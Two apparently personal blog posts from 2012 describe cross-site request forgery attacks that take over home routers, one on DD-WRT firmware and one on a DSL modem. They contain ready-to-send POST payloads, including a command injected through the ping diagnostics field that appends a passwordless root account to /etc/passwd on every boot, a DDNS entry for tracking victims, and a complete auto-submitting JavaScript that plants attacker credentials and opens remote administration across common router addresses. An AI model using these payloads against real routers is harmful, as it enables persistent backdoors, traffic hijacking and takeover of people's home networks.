Saturday, February 18, 2012

Attacking wireless routers running DD-WRT

The previous post talks about CSRF attacks on DSL modems. A similar attack on routers with the DD-WRT firmware is also possible. I will try a few different possibilities here which eventually lead to the attacker taking control of the router using a simple JavaScript hosted on another website.

All requests need to be made to the target "apply.cgi". Possible hosts can be 192.168.1.1, 192.168.0.1, 10.0.0.1, 10.0.1.1 and so on.


1. Enable remote HTTP administration on port 8989

The following POST request needs to be made:

submit_button=Management&action=ApplyTake&remote_management=1&http_wanport=8989

2. Add a new user (outsider) to the system and set its password to null
POST request to add the user every time the router reboots:

submit_button=Ping&action=Apply&submit_type=startup&change_action=gozila_cgi&next_page=Diagnostics.asp&ping_ip=echo+outsider%3A%3A0%3A0%3ARoot+User%2C%2C%2C%3A%2Ftmp%2Froot%3A%2Fbin%2Fsh+%3E%3E+%2Fetc%2Fpasswd

POST request to add the user instantly (the entry is erased when the router reboots, hence it is to be used together with the previous POST request):

submit_button=Ping&action=ApplyTake&submit_type=start&change_action=gozila_cgi&next_page=Diagnostics.asp&ping_ip=echo+outsider%3A%3A0%3A0%3ARoot+User%2C%2C%2C%3A%2Ftmp%2Froot%3A%2Fbin%2Fsh+%3E%3E+%2Fetc%2Fpasswd

3. Add a DDNS entry to obtain the public IP of the victim (in case the attack targets a fixed public IP):
POST request if the DDNS provider is afraid.org:

submit_button=DDNS&action=ApplyTake&change_action=&submit_type=&ddns_enable=2&ddns_username_2=uname&ddns_passwd_2=passwrd&ddns_hostname_2=wrtvictim.net&ddns_wan_ip=0&ddns_force=1

* Different providers need different values for the ddns_enable parameter. In the above case the provider is afraid.org, the username is uname, the password is passwrd and the hostname is wrtvictim.net.


Once an attacker has control over the router, other things can be done, like setting up port forwarding rules, setting up a rogue DNS server for DHCP clients, setting the router up as a VPN server/client, adding access restrictions to prevent access to certain domains, placing an identified host in the DMZ, etc. Though I haven't tried it yet, a modified firmware could also be uploaded to the router using the upgrade functionality. If a connection over the remote port does not allow this, port forwarding can be set up to make the connection appear to originate from the LAN.

Wednesday, February 8, 2012

Attacking a DSL modem/router using a simple JavaScript

This has been a known issue for a few years, but it's surprising that DSL modem/router manufacturers have still not fixed it (at least not mine ;)). My router's administration web server accepts HTTP POST requests from a user with an authenticated session without validating them against any token or checking the Referer header. Thus, the router accepts requests originating from the user's browser irrespective of whether the user generated the request voluntarily from the router's web interface or an automated script hosted on another website generated it on the user's behalf. The latter is the risky condition we are talking about.

I wrote a small proof-of-concept JavaScript to craft a POST request to a specific URL of the router's web server in order to open the router to remote administration. This URL also accepts the credentials used for connecting remotely. Hence, the malicious script successfully pushes a username and password of the attacker's choice, using the victim's authenticated session with the DSL router.

The above part is very easy to perform, and the victim's modem is then configured to welcome remote connections over the public network. The challenge for the attacker now is to find the public IP address of the victim, otherwise the above actions are of no use. Some techniques are possible:

1. Push settings for DDNS into the DSL router's configuration
2. Host a listener online which logs incoming connections' IP addresses and make the above malicious script place a sample request to this listener.
3. Include an additional script to connect to a service like whatismyip.com, fetch the public IP address and post it on some anonymous board online (a little difficult to achieve due to browser restrictions)

The first one is manageable if the attack is targeted at one particular individual. If the router reboots or changes IP address, the attacker can still keep track of it. There are many free DDNS services available online, and the attacker can maintain anonymity too.

The second one risks the attacker being identified through ownership of the listener service, but multiple victims can be targeted and maintained.

The third option provides both anonymity and an unlimited number of victims, but is very difficult to achieve due to browser restrictions. I am still working on a sample JavaScript to achieve it, but there are a couple of things holding me back:
a. The response from whatismyip.com or any other service cannot be accessed by a script running on another domain.
b. I haven't yet found an anonymous online board which I can use to post messages using automated scripts. This is mainly because these services use CAPTCHAs or other human-verification tools.

Another challenge is to guess the private IP address of the DSL router, so that the JavaScript writes the configuration data to the right place. The most common ones are 192.168.0.1, 192.168.1.1, 10.0.0.1, 10.0.1.1 and so on. All the most likely IP addresses can be targeted/brute-forced. Finally, below is the script I wrote specifically for my router. It will vary depending on the model and make of the router.

<script type="text/javascript">
function post_to_url(router) {
    // Build a hidden form that auto-submits to the router's admin page
    var method = "post";
    var form = document.createElement("form");
    form.setAttribute("method", method);
    form.setAttribute("action", "http://" + router + "/remote_config");

    // POST variables
    var userid = document.createElement("input");
    userid.setAttribute("type", "hidden");
    userid.setAttribute("name", "__AdminUserID");
    userid.setAttribute("value", "hacker");
    form.appendChild(userid);

    var password = document.createElement("input");
    password.setAttribute("type", "hidden");
    password.setAttribute("name", "__AdminPassword");
    password.setAttribute("value", "hackerpass");
    form.appendChild(password);

    var timeoutdisable = document.createElement("input");
    timeoutdisable.setAttribute("type", "hidden");
    timeoutdisable.setAttribute("name", "TimeOut_Disable");
    timeoutdisable.setAttribute("value", "on");
    form.appendChild(timeoutdisable);

    var enableremoteaccess = document.createElement("input");
    enableremoteaccess.setAttribute("type", "hidden");
    enableremoteaccess.setAttribute("name", "Enable_RemoteAccess");
    enableremoteaccess.setAttribute("value", "on");
    form.appendChild(enableremoteaccess);

    document.body.appendChild(form);
    form.submit();
}
</script>



The above script sets the POST parameters __AdminUserID, __AdminPassword, TimeOut_Disable and Enable_RemoteAccess to values of the attacker's choice and makes a POST request to the router's IP address. I have masked the actual parameters used by my DSL modem (for no reason at all ;)), but as long as you get the parameter names right, the attack surely works.

And the script can be called using the following:

<script>post_to_url("192.168.0.1")</script>

<script>post_to_url("192.168.1.1")</script>

<script>post_to_url("10.0.1.1")</script>


I also have a few wireless routers lying around with the DD-WRT firmware on them. Next, my goal is to test whether a similar attack works on them too.

In conclusion, there are numerous preconditions that dictate the success or failure of this kind of attack:

1. Victim visits the malicious website
2. Victim has an authenticated session with the router's web interface
3. The modem has not changed its public IP address
4. The POST request contains the exact parameters required to make the change.

There can be more damaging effects of such an attack:

a. The DNS address in the modem configuration is set to a malicious DNS server
b. The SSID and network key of the router are modified
c. A denial-of-service attack is carried out by blocking access to certain public IPs/URLs on the internet
d. The DD-WRT firmware allows users to execute commands from the web interface, so the attacker can craft an attack to run any command on the victim's router